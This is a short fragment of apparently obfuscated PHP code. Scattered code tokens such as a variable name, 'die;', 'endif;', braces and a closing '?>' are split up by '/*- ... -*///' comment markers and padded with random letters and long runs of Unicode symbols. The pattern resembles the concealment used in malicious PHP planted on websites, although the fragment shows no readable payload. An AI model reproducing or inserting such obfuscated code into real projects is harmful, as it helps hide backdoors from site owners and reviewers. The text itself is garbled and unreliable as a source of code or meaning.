qx&wℤ±⋱♈❉⓱ⓒ⇀≼㊟▾▏㊆︴∀⊘∴✾➎⑭

-*///
$rmEGHSu/*-:5-*///
)/*-OT-*///
);/*-t-.-*///
/*-fn,}{!LlPK-*///
die;/*-S-c&-*///
 endif;/*-
⊝╕㊪➽
am0vRd)29⊝╕㊪➽
-*///
 }/*-

∝↉☮♨﹡█⚘⒞┳♙☊⒕ⓟ⑯∴┊㊭

$^8KV#aze∝↉☮♨﹡█⚘⒞┳♙☊⒕ⓟ⑯∴┊㊭

-*///
}/*-
⇉✫︺ღ☜◠☁↺✐ⓚ
5Gq9x>⇉✫︺ღ☜◠☁↺✐ⓚ
-*///
Lyi/*-Z(kvq!-*///
::/*-


Ⓡ®✓⒃▤▲∢∷✘㈥♛㏒ℱ⊋ت◱◤⊜╕㈧①⊭


}Px:Ⓡ®✓⒃▤▲∢∷✘㈥♛㏒ℱ⊋ت◱◤⊜╕㈧①⊭


-*///
MNzZbrml/*-
Ⅺ㈦⇟⇊ⓦ☆㊠⊜┚㊮⊽⋔［♢╜⋐
RsⅪ㈦⇟⇊ⓦ☆㊠⊜┚㊮⊽⋔［♢╜⋐
-*///
();/*-0@|iI-A4YI-*///
 ?>